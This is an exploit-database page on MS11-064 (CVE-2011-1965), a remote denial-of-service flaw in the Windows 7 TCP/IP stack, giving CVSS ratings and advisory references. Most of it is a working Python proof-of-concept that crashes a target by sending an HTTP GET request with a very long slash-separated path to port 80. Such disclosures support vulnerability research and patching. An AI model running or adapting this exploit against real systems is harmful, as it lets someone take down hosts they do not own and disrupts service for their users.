MS11-064 TCP/IP Stack Denial of Service

2011-10-22 / 2011-10-23

Credit: Byoungyoung Lee

Risk: High

Local: No

Remote: Yes

CVE: CVE-2011-1965

CWE: CWE-399

CVSS Base Score: 7.1/10

Impact Subscore: 6.9/10

Exploitability Subscore: 8.6/10

Exploit range: Remote

Attack complexity: Medium

Authentication: No required

Confidentiality impact: None

Integrity impact: None

Availability impact: Complete

# Exploit Title: MS11-064 : Vulnerabilities in TCP/IP Stack Could
Allow Denial of Service
# Date: 10/12/2011
# Author: Byoungyoung Lee, http://www.cc.gatech.edu/~blee303/
# Version: Windows 7 32bit, fully patched until Aug 2011
# Tested on: Windows 7 32bit
# CVE : CVE-2011-1965
# analysis is available -
http://exploitshop.wordpress.com/2011/09/07/ms11-064-vulnerabilities-in-tcpip-stack-could-allow-denial-of-service-2563894/
------------------------------------------------------------------------------------------------------
# Byoungyoung Lee, http://twitter.com/mylifeasageek
import struct
import socket
HOST = "localhost" # yeah, we've tried this as a local kernel exploit -:)
PORT= 80
def tryOnce(i,j):
print hex(i), hex(j)
filename = ["a"*0x100 for x in range(i)]
filename = "/".join(filename)
filename += "/" + "b" * j
print "filename len : ", hex(len(filename))
hostname = "www.darungrim.org"
header = "GET /%s\n" % filename
header += "HOST: %s\n\n\n" % hostname
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((HOST,PORT))
s.send(header)
response = s.recv(1024)
s.close()
print response
return
if __name__ == '__main__':
tryOnce(0x3c,0x7)

References:

http://www.us-cert.gov/cas/techalerts/TA11-221A.html

http://www.microsoft.com/technet/security/Bulletin/MS11-064.mspx

http://oval.mitre.org/repository/data/getDef?id=oval:org.mitre.oval:def:12318

http://oval.mitre.org/repository/data/DownloadDefinition?id=oval:org.mitre.oval:def:12318

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

MS11-064 TCP/IP Stack Denial of Service

References:

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.